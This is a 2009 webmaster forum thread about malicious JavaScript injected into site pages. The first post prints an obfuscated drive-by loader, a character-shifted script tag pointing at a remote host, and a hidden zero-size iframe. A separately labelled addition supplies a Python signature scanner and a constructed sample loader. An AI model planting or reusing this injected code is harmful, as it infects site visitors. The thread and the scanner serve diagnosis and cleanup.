
Website Technology Issues Forum

    
Malware Traps?
mqcarpenter




msg:3898569
 12:32 pm on Apr 23, 2009 (gmt 0)

Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]

 

ebby




msg:3898590
 12:56 pm on Apr 23, 2009 (gmt 0)

This just happened to me also; any help would be greatly appreciated. Mine was a PunBB forum.

ebby




msg:3898594
 1:05 pm on Apr 23, 2009 (gmt 0)

This is the exact same code found on my index and login php pages. EXACT. Not cool.

mqcarpenter




msg:3898720
 3:56 pm on Apr 23, 2009 (gmt 0)

Well I did not do it! lol

ebby




msg:3898752
 4:30 pm on Apr 23, 2009 (gmt 0)

What type of site was it?

neil665




msg:3899470
 11:14 am on Apr 24, 2009 (gmt 0)

Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional U.K. tourism site
and the 'mysite.com' is where I do my future development.

Both sites are on the same server located in the U.K.

Have now changed the passwords.

Regards

Neil

Mishkan




msg:3901097
 7:35 pm on Apr 26, 2009 (gmt 0)

Hi

I also had the same thing.

I deleted the codes and after 2 days it was up again on the index.php and login.php files on my site.

Does anyone know what this is?

g1smd




msg:3901132
 8:59 pm on Apr 26, 2009 (gmt 0)

Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; WordPress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.
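
Added example, not part of any post in this thread: a Python scanner for the injected pattern quoted in the first post (the /*@cc_on block, the charCodeAt(i)-1 decoder, the zero-size iframe and the "ad" comment markers), for checking a whole docroot after cleanup and for spotting the code if it reappears. The function names, the signature names and the malware.example URL in the constructed sample are assumptions made for illustration.

```python
import re
from pathlib import Path

# Patterns taken from the snippet in the first post; a hit means "review this file".
SIGNATURES = {
    "cc_on_block": re.compile(r"/\*@cc_on\b.*?/\*@if\s*\(@_win32\)", re.S),
    "shift_decoder": re.compile(
        r"String\.fromCharCode\(\s*\w+\.charCodeAt\(\s*\w+\s*\)\s*-\s*1\s*\)"),
    "hidden_iframe": re.compile(
        r"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?0\b)(?=[^>]*\bheight\s*=\s*[\"']?0\b)", re.I),
    "ad_marker": re.compile(r"<!--\s*ad\s*-->.*?<!--\s*/ad\s*-->", re.S),  # weakest signal
}

def decode_shift(literal, shift=1):
    """Undo the loader's obfuscation: every character code was raised by `shift`."""
    return "".join(chr(ord(c) - shift) for c in literal if ord(c) >= shift)

def scan_text(text):
    """Return (signature names found, decoded string literals that hide a <script> tag)."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(text)]
    decoded = []
    if "shift_decoder" in hits:
        for literal in re.findall(r'var\s+\w+\s*=\s*"([^"]{20,})"', text):
            plain = decode_shift(literal)
            if "<script" in plain.lower():
                decoded.append(plain)
    return hits, decoded

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Scan every web file under root; return {path: (hits, decoded)} for flagged files."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits, decoded = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = (hits, decoded)
    return report

def constructed_sample():
    """Constructed test page: same loader shape as the post, harmless placeholder URL."""
    hidden = '<script type="text/javascript" src="http://malware.example/stats.js"></script>'
    encoded = "".join(chr(ord(c) + 1) for c in hidden)
    return ('<?php /* login */ ?>\n<!-- ad --><html><script>\n/*@cc_on @*/\n/*@if (@_win32)\n'
            'var source ="' + encoded + '"; var result = "";\n'
            'for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);\n'
            'document.write(result);\n/*@end @*/\n</script></html><!-- /ad -->')
```

Run scan_tree() against a downloaded copy of the site; any file it returns should be compared with a known-good backup before it is put back online.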

neil665




msg:3902237
 9:01 am on Apr 28, 2009 (gmt 0)

The 'mysite.com' site was again attacked yesterday,
and Google has blocked this site.

Regards Neil

lammert




msg:3902259
 9:55 am on Apr 28, 2009 (gmt 0)

Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather than the website operator.

neil665




msg:3902984
 6:37 am on Apr 29, 2009 (gmt 0)

Using shared hosting.
Does VPS provide a higher level of security?
Is it still open to hackers adding malicious code?

Regards Neil
